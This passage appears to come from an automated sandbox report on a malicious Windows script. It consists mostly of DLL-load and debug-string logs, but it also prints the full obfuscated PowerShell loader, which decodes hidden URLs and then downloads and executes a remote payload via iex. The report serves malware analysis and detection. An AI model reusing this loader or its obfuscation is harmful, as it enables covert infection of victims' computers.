Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb_ source: powershell.exe, 00000003.00000002.1554617977.000002A67CA47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553526249.000002A67C920000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb]Y source: powershell.exe, 00000003.00000002.1552369513.000002A67C75B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kore.pdb5 source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Htem.pdb% source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb 024 source: powershell.exe, 00000000.00000002.1735847498.0000022A2ACA6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb'N source: powershell.exe, 00000003.00000002.1554888189.000002A67CA85000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdb! source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb- source: powershell.exe, 00000007.00000002.2752630395.0000022536E27000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000007.00000002.2755751802.0000022537072000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbon.resourcesy source: powershell.exe, 00000000.00000002.1735847498.0000022A2AC61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370AB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdb source: powershell.exe, 00000003.00000002.1554151718.000002A67C9DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2755751802.00000225370C4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
